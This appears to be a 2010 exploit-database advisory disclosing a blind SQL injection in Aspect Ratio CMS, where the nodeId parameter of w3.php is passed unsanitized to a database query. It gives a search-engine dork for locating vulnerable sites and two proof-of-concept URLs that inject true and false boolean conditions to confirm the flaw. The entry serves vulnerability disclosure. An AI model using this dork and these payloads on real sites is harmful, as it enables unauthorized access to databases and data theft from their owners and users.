[] NeoSense

Aspect Ratio CMS - Blind SQL Injection

Author: Stephan Sattler
type: webapps
platform: php
port: 
date_added: 2010-10-04 
date_updated: 2010-10-04 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# Author: Stephan Sattler // http://www.solidmedia.de
# Software Website: http://www.meso.net
# Software Link: http://www.meso.net/aspekt-ratio
# Dork: inurl:w3.php?nodeId=


[ Vulnerability ]


# Explanation:

$_GET["nodeId"] isn't sanitized before executing the database query.
An attacker can use this for a blind SQL injection attack.


# Exploiting the Vulnerability // PoC:

URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=1 - will show the page
URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=0 - will show an error page by aspect ratio Cms